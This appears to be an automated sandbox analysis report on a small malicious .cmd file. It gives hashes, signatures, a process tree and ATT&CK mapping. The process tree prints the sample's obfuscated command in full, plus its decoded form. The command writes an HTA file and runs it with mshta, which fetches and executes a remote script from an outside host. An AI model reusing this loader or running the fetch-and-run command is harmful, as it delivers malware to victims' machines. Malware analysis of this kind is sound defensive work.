758416f5eaeb77570a9529e928cf21a38e803664412a198452719a8b9e994d19

General

Target

536749.742.67513.78924_208.69621.4895824ã.cmd
Size

344B
MD5

19461ec95d2ed8da4cc2c4d9550aa125
SHA1

16a95e645237cfcf43e1ac67608783513e7dbfe3
SHA256

758416f5eaeb77570a9529e928cf21a38e803664412a198452719a8b9e994d19
SHA512

4e4d8e9fe6969546c188f02c28525bcaf589801c72054e2e116d05189e6004283a395110717b8936d520ebedc4e9b3b49bc6327d395689c186e695942a03adbe

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

Processes:

mshta.exe

flow pid process

5 1036 mshta.exe
7 1036 mshta.exe
9 1036 mshta.exe
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main mshta.exe

flow	pid	process
5	1036	mshta.exe
7	1036	mshta.exe
9	1036	mshta.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.execmd.execmd.execmd.exe

description	pid	process	target process
PID 760 wrote to memory of 380	760	cmd.exe	cmd.exe
PID 760 wrote to memory of 380	760	cmd.exe	cmd.exe
PID 760 wrote to memory of 380	760	cmd.exe	cmd.exe
PID 380 wrote to memory of 268	380	cmd.exe	cmd.exe
PID 380 wrote to memory of 268	380	cmd.exe	cmd.exe
PID 380 wrote to memory of 268	380	cmd.exe	cmd.exe
PID 380 wrote to memory of 1488	380	cmd.exe	cmd.exe
PID 380 wrote to memory of 1488	380	cmd.exe	cmd.exe
PID 380 wrote to memory of 1488	380	cmd.exe	cmd.exe
PID 1488 wrote to memory of 772	1488	cmd.exe	cmd.exe
PID 1488 wrote to memory of 772	1488	cmd.exe	cmd.exe
PID 1488 wrote to memory of 772	1488	cmd.exe	cmd.exe
PID 772 wrote to memory of 1036	772	cmd.exe	mshta.exe
PID 772 wrote to memory of 1036	772	cmd.exe	mshta.exe
PID 772 wrote to memory of 1036	772	cmd.exe	mshta.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\536749.742.67513.78924_208.69621.4895824ã.cmd"
1⤵
- Suspicious use of WriteProcessMemory
PID:760

C:\Windows\system32\cmd.exe
cmd /V/D/c "seT sKk=script&&seT px=mshta&&SEt AJKP=C:\Users\Public\Videos\^dOW&&SEt GSEM=^<!sKk!^>try{vfYYar c='!sKk!:';d='hfYYTtP:';GfYYetObjfYYect(c+d+'&&sET 9IF=BOTKRBOTKRa9eikr.5wyck43a9uxnu7e.cfdBOTKR?1BOTKR');}catch(e){}close();^</!sKk!^>&&sEt/^p JGDH="!GSEM:fYY=!!9IF:BOTKR=/!"<nul > !AJKP!.Hta|start /MIN CMD /c !px! !AJKP!.HtA "
2⤵
- Suspicious use of WriteProcessMemory
PID:380

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" sEt/p JGDH="<script>try{var c='script:';d='hTtP:';GetObject(c+d+'//a9eikr.5wyck43a9uxnu7e.cfd/?1/');}catch(e){}close();</script>" 0<nul 1>C:\Users\Public\Videos\dOW.Hta"
3⤵
PID:268

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" start /MIN CMD /c mshta C:\Users\Public\Videos\dOW.HtA "
3⤵
- Suspicious use of WriteProcessMemory
PID:1488

C:\Windows\system32\cmd.exe
CMD /c mshta C:\Users\Public\Videos\dOW.HtA
4⤵
- Suspicious use of WriteProcessMemory
PID:772

C:\Windows\system32\mshta.exe
mshta C:\Users\Public\Videos\dOW.HtA
5⤵
- Blocklisted process makes network request
- Modifies Internet Explorer settings
PID:1036

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Public\Videos\dOW.HtA
MD5
4493b5e3f684c33ba8ee862f2fdb9944

SHA1
e489710719416946503438f5675da901b8ee0dd8

SHA256
f1c703ab466011aaf49c4f2284a0a0d9c85f53095369022648d32692271ede2a

SHA512
3a8b5a970621eea4bab132b7ed85394d90295a93c3c834386ee3c27c6fde3c8128e08d182f7ab84759822f785fa32dd4a1b3b2e65162271deb4183b48887969a

Download Submit
memory/268-56-0x0000000000000000-mapping.dmp

Download
memory/380-55-0x0000000000000000-mapping.dmp

Download
memory/772-58-0x0000000000000000-mapping.dmp

Download
memory/1036-59-0x0000000000000000-mapping.dmp

Download
memory/1488-57-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing